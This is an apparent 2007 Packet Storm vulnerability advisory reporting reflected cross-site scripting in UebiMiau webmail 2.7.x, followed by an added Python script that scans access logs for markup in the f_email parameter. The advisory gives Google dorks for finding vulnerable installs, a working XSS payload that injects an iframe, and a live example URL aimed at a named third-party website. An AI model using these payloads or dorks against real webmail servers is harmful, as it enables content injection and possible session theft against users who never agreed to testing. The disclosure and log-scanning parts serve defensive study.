
uebimiau27x-xss.txt

Posted on 05 October 2007

Hi Packet Storm;

I want to report a vulnerability of type XSS in a Webmail, this is UebiMiau.

Thank you.

+===================================================================+
+      UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities       +
+===================================================================+

Author(s): www.nullcode.com.ar
Product: UebiMiau WebMail.
Web: http://www.uebimiau.org/download.php
Versions: 2.7.x (or less)
Date: 03/10/2007

TESTED ON: UebiMiau WebMail 2.7.x (or less)
----------
[x] Apache/1.3.33 (Debian GNU/Linux) - PHP/4.3.10-19
[+] Apache/1.3.37 (Unix) - PHP/4.4.4
[+] Apache/1.3.37 (Unix) - PHP/5.2.1
[+] Apache/1.3.37 (Unix) - PHP/5.2.2
[+] Apache/2.0.53 (Fedora) - PHP/4.3.11
[+] Apache/2.0.55 (Unix) - PHP/5.2.0
[x] Apache/2.2.3 (Debian) - PHP/4.4.4-8+etch4

GOOGLE DORKS:
------------
[+] intext:Powered by UebiMiau!
[+] intitle:uebimiau
[+] inurl:/webmail/index.php?lid=

EXPLOIT:
--------
For example...after the variable "email"

index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS]

index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=="><h1>Null Code Services</h1>="><iframe%20src=http://www.nullcode.com.ar/></iframe>

EXAMPLE (on line):
------------------
http://www.coffeeswirls.com/webmail/index.php?lid=6&tid=1&f_user=&six=&f_email==%22%3E%3Ch1%3ENull%20Code%20Services%3C/h1%3E=%22%3E%3Ciframe%20src=http://www.google.com/%3E%3C/iframe%3E

GREETS: str0ke, and to the same ones always from www.nullcode.com.ar ;)

NULL CODE SERVICES [ www.nullcode.com.ar ]
Hunting Security Bugs!

+===================================================================+
+      UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities       +
+===================================================================+

--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
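For operators of an affected install, the following is an added detection example, not part of the original advisory or of UebiMiau's code: it scans Apache access-log lines for index.php requests whose f_email parameter decodes to HTML markup characters, the pattern the advisory describes. The log format, the sample lines and all function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache common/combined access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a value close an HTML attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\']')
# Only the parameter the advisory demonstrates; extend after reviewing the code.
WATCHED_PARAMS = ("f_email",)

def suspicious_params(log_line):
    """Return {param: decoded value} for watched params that carry markup."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/index.php"):
        return {}
    # parse_qs percent-decodes, so %22%3E is seen as "> here.
    query = parse_qs(url.query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if MARKUP_RE.search(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every log line that matched."""
    return [(n, h) for n, line in enumerate(lines, 1)
            if (h := suspicious_params(line))]

# Constructed sample log lines (documentation IPs, harmless marker text).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Oct/2007:10:00:00 +0000] "GET /webmail/index.php'
    '?lid=de&tid=modern_blue&f_user=&six=&f_email=user%40example.test'
    ' HTTP/1.1" 200 5120',
    '192.0.2.11 - - [05/Oct/2007:10:00:05 +0000] "GET /webmail/index.php'
    '?lid=de&tid=modern_blue&f_user=&six=&f_email==%22%3E%3Ch1%3Etest%3C/h1%3E'
    ' HTTP/1.1" 200 5180',
    '192.0.2.12 - - [05/Oct/2007:10:00:09 +0000] "GET /webmail/index.php'
    '?lid=de HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```

A hit means markup was sent in the parameter, not that it executed in a browser; the durable fix is HTML-encoding the value where the login page writes it back into the form.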
